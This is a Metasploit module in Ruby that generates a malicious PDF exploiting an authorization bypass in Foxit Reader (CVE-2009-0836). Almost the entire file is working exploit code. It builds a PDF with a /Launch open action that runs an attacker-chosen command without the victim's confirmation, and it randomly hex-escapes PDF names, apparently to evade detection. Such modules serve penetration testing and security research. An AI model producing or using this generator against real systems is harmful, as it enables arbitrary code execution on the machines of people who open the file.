1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'zlib'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Foxit Reader Authorization Bypass',
16
        'Description' => %q{
17
          This module exploits an authorization bypass vulnerability in Foxit Reader
18
          build 1120. When an attacker creates a specially crafted pdf file containing
19
          an Open/Execute action, arbitrary commands can be executed without confirmation
20
          from the victim.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
24
        'References' => [
25
          [ 'CVE', '2009-0836' ],
26
          [ 'OSVDB', '55615'],
27
          [ 'BID', '34035' ],
28
        ],
29
        'DisclosureDate' => '2009-03-09',
30
        'Notes' => {
31
          'Stability' => [CRASH_SAFE],
32
          'SideEffects' => [],
33
          'Reliability' => []
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
41
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf'])
42
      ]
43
    )
44
  end
45

46
  def run
47
    exec = datastore['CMD']
48

49
    # Create the pdf
50
    pdf = make_pdf(exec)
51

52
    print_status("Creating '#{datastore['FILENAME']}' file...")
53

54
    file_create(pdf)
55
  end
56

57
  # https://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
58
  def n_obfu(str)
59
    result = ''
60
    str.scan(/./u) do |c|
61
      if (rand(2) == 0) && (c.upcase >= 'A') && (c.upcase <= 'Z')
62
        result << '#%x' % c.unpack('C*')[0]
63
      else
64
        result << c
65
      end
66
    end
67
    result
68
  end
69

70
  def random_non_ascii_string(count)
71
    result = ''
72
    count.times do
73
      result << rand(128..255).chr
74
    end
75
    result
76
  end
77

78
  def io_def(id)
79
    '%d 0 obj' % id
80
  end
81

82
  def io_ref(id)
83
    '%d 0 R' % id
84
  end
85

86
  def make_pdf(exec)
87
    xref = []
88
    eol = "\x0d\x0a"
89
    endobj = 'endobj' << eol
90

91
    # Randomize PDF version?
92
    pdf = "%%PDF-#{rand(1..2)}.#{rand(1..2)}" << eol
93
    pdf << '%' << random_non_ascii_string(4) << eol
94
    xref << pdf.length
95
    pdf << io_def(1) << n_obfu('<</Type/Catalog/Outlines ') << io_ref(2) << n_obfu('/Pages ') << io_ref(3) << n_obfu('/OpenAction ') << io_ref(5) << '>>' << endobj
96
    xref << pdf.length
97
    pdf << io_def(2) << n_obfu('<</Type/Outlines/Count 0>>') << endobj
98
    xref << pdf.length
99
    pdf << io_def(3) << n_obfu('<</Type/Pages/Kids[') << io_ref(4) << n_obfu(']/Count 1>>') << endobj
100
    xref << pdf.length
101
    pdf << io_def(4) << n_obfu('<</Type/Page/Parent ') << io_ref(3) << n_obfu('/MediaBox[0 0 612 792]>>') << endobj
102
    xref << pdf.length
103
    pdf << io_def(5) << "<</Type/Action/S/Launch/F << /F(#{exec})>>/NewWindow true\n" + io_ref(6) + '>>' << endobj
104
    xref << pdf.length
105
    pdf << endobj
106
    xref_position = pdf.length
107
    pdf << 'xref' << eol
108
    pdf << '0 %d' % (xref.length + 1) << eol
109
    pdf << '0000000000 65535 f' << eol
110
    xref.each do |index|
111
      pdf << '%010d 00000 n' % index << eol
112
    end
113
    pdf << 'trailer' << n_obfu('<</Size %d/Root ' % (xref.length + 1)) << io_ref(1) << '>>' << eol
114
    pdf << 'startxref' << eol
115
    pdf << xref_position.to_s << eol
116
    pdf << '%%EOF' << eol
117
  end
118
end
119

120